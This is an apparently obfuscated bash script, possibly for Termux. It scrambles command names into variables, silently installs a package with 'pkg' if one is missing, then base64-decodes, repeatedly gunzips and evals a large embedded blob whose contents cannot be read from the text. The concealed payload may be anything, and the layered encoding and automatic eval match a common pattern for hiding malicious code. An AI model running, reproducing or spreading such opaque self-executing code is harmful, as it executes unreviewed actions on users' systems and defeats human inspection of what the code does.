#!/bin/bash
z="
";Cz='Zzzz';hz=']]; ';Nz=''\''ech';gz=' '\'''\'' ';iz='then';Dz='ZZzz';Xz=''\''';Gz='zzz=';Tz='e64'\''';lz='zzZZ';Jz='zZzZ';Bz='ZZZZ';Wz=''\'' -d';Oz='o'\''';Qz=''\''eva';Hz=''\''gzi';az='$zzz';Sz=''\''bas';oz='fi';Pz='zzZz';Iz='p'\''';jz='pkg ';fz='Zz =';kz='i $z';Fz='ZZZz';Kz='zZzz';dz='if [';Vz='Zzz=';Yz='$(wh';Ez='zzzz';Mz='zZz=';nz='y';Rz='l'\''';Lz='ZzzZ';ez='[ $z';Az='zzzZ';cz=')';bz='zZZZ';mz='zz -';Zz='ich ';Uz='zZZz';eval "$Az$Bz$Cz$Dz$Ez$Fz$Ez$Ez$Dz$Gz$Hz$Iz$z$Az$Az$Cz$Jz$Kz$Kz$Lz$Ez$Cz$Mz$Nz$Oz$z$Az$Jz$Kz$Pz$Jz$Az$Jz$Kz$Pz$Gz$Qz$Rz$z$Pz$Pz$Ez$Cz$Ez$Kz$Az$Ez$Kz$Gz$Sz$Tz$z$Pz$Kz$Az$Ez$Az$Az$Az$Uz$Az$Vz$Wz$Xz$z$Kz$Pz$Dz$Kz$Az$Az$Kz$Az$Ez$Mz$Yz$Zz$az$Bz$Dz$Uz$Ez$bz$Ez$Ez$Uz$Ez$cz$z$dz$ez$Cz$Jz$Cz$Cz$Pz$Pz$Cz$Pz$Ez$fz$gz$hz$iz$z$jz$kz$lz$Bz$Az$Cz$Az$Dz$Ez$Az$Cz$mz$nz$z$oz";zZzzzzzzzzZZZZZZZzzzzzzzzZZzzzZzzzZZzzz=$($zzzZzzzZZzzzzZzZzZzzzZzzZzzZzzzzZzzzzZz "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
J3Be4dW3/xdJu5Ys1QYAAFX76SLoBgAA"|$zzZzzzZzzzzzZzzzzzzzzZzzzzzZzzzzzZzzzzz$zzZzzZzzzzzZzzzzzzzZzzzZzzzZzZZzzzzZZzz|$zzzZZZZZZzzzZZzzzzzzZZZzzzzzzzzzZZzzzzz$zzZzzZzzzzzZzzzzzzzZzzzZzzzZzZZzzzzZZzz|$zzzZZZZZZzzzZZzzzzzzZZZzzzzzzzzzZZzzzzz$zzZzzZzzzzzZzzzzzzzZzzzZzzzZzZZzzzzZZzz|$zzzZZZZZZzzzZZzzzzzzZZZzzzzzzzzzZZzzzzz$zzZzzZzzzzzZzzzzzzzZzzzZzzzZzZZzzzzZZzz|$zzzZZZZZZzzzZZzzzzzzZZZzzzzzzzzzZZzzzzz$zzZzzZzzzzzZzzzzzzzZzzzZzzzZzZZzzzzZZzz|$zzzZZZZZZzzzZZzzzzzzZZZzzzzzzzzzZZzzzzz$zzZzzZzzzzzZzzzzzzzZzzzZzzzZzZZzzzzZZzz|$zzzZZZZZZzzzZZzzzzzzZZZzzzzzzzzzZZzzzzz$zzZzzZzzzzzZzzzzzzzZzzzZzzzZzZZzzzzZZzz|$zzzZZZZZZzzzZZzzzzzzZZZzzzzzzzzzZZzzzzz$zzZzzZzzzzzZzzzzzzzZzzzZzzzZzZZzzzzZZzz|$zzzZZZZZZzzzZZzzzzzzZZZzzzzzzzzzZZzzzzz$zzZzzZzzzzzZzzzzzzzZzzzZzzzZzZZzzzzZZzz);$zzzZzZzZzZzzzzZzzZzZzzzZzZzZzZzzzzZzzzz "$zZzzzzzzzzZZZZZZZzzzzzzzzZZzzzZzzzZZzzz"
